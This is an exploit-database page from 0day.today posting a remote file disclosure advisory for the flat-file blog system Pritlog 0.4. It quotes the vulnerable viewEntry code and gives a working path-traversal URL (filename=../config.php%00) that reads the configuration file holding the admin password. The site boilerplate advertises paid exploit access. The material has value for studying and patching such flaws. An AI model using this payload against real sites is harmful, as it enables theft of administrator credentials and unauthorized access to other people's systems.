0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pritlog <= 0.4 (filename) Remote File Disclosure Vulnerability
============================================================== Pritlog <= 0.4 (filename) Remote File Disclosure Vulnerability ============================================================== -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog <= 0.4: Remote File Edition Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $ Program: Printlog $ File affected: index.php $ Version: 0.4 $ Download: http://www.hardkap.net/pritlog -- Description (by the author's page) -- PRITLOG is an extremely simple, small and powerful blog system. It does not use or need a MYSQL database and fully works based on flat files. The idea is derived from a similar app called PPLOG. -- Bug -- You can navigate and see the entries. Something like as: http://localhost/p/index.php?option=viewEntry&filename=00001 Code doesn't check the comments directory: 709. function viewEntry() { 710. $fileName = isset($_POST['filename'])?$_POST['filename']:$_GET['filename']; 711. global $postdir, $separator, $newPostFile, $newFullPostNumber, $debugMode, $config_textAreaCols, $config_textAreaRows; 712. global $config_allowComments, $config_commentsSecurityCode, $config_CAPTCHALength, $config_randomString; 713. global $commentdir,$config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA; 714. $viewFileName=$postdir.$fileName.$config_dbFilesExtension; -- Exploit -- If magic quotes are off you can do: http://localhost/p/index.php?option=viewEntry&filename=../config.php%00 config.php has the admin password # 0day.today [2024-11-14] #